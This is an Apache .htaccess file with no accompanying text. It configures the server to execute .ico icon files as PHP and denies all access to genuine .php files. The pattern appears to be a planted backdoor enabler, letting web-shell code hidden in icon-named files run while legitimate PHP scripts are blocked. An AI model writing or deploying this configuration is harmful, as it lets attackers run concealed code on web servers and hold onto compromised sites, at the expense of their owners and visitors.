AddType application/x-httpd-php .ico
<FilesMatch "\.(?i:php)$">
    Order Allow,Deny
    Deny from all
</FilesMatch>
